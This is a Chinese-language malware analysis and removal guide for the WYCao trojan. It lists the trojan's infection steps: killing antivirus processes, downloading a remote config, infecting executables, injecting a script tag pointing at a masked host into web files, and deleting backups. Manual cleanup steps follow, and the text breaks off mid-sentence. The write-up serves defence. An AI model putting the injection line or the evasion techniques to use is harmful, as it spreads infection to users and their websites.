查殺explorer.exe,windows.txt,msdos.bat,zzz.sys病毒

根據我們蜜罐網絡的監測,最近感染最多的木馬病毒是以WYCao爲代表的explorer.exe,windows.txt,msdos.bat,zzz.sys等病毒,

WYCao病毒技術分析:

1． 判斷SYSTEM\\CurrentControlSet\\Services\\BITS在不在，在了繼續運行，不再退出(可做免疫,不過該服務和autoupdata,相關聯關閉對自動更新有影響)。
2． 複制自己到%windows%\tasks\0x01xx8p.exe，刪除當前運行的母體。
3． 複制explorer.exe到%windows%\tasks\ sysfile.brk和explorer.ext,感染explorer.ext，新建一個.WYCao節將自己寫入，並將感染的explorer.ext替換原來的explorer.exe。
4． 提升自己爲SeDebugPrivilege權限，判斷進程中有沒有avp.exe kvsrvxp.exe kissvc.exe,發現了用OpenProcess TerminateProcess CloseHandle來結束，僅測試毒霸kissvc.exe不會被病毒結束。
5． 下載病毒配置文件http://xxxx.158dm.com/config.txt到C:\WINDOWS\ system32\ windows.txt
6． 將Down下的病毒下載地址放到HKEY_LOCAL_MACHINE\ SOFTWARE\ Data\ Config鍵值下，通過InternetOpenA來下載。
7． 將非系統文件夾下的所有.scr .com .cmd .bat .exe文件，新建一個.WYCao節將自己寫入。感染所有的.do .htm .html .shtm .shtml .aspx .php .jsp .cgi .xml文件加入<script language="JavaScript" src=http://xxxx.158dm.com/one/arp.js></script>，刪除所有的.gho文件。
8． 創建c:\ zzz.sys，並用SC來創建運行服務zzz，來突破還原系統，將感染的explorer.exe寫入\\.\yyy2\windows\explorer.exe
9． 感染的PE文件先將病毒加密數據解密釋放到%windows%/windows.ext文件，運行後刪除，在跳到PE文件正常的OEP來運行，OEP並沒有加密。

清除建議:

1.使用木馬清除大師2008全面清除(http://www.lofocus.com/download)

2. 由于該病毒沒有寫啓動項來運行病毒,也沒有什麽保護進程,所以可以在安全模式下,用任務管理器將explorer.exe結束掉.然後到文件--新建任務裏輸入C:\WINDOWS\system32\dllcache\explorer.exe 確定運行,然後複制C:\WINDOWS\system32\dllcache\explorer.exe到你的c:\windows\explorer.exe 刪除原來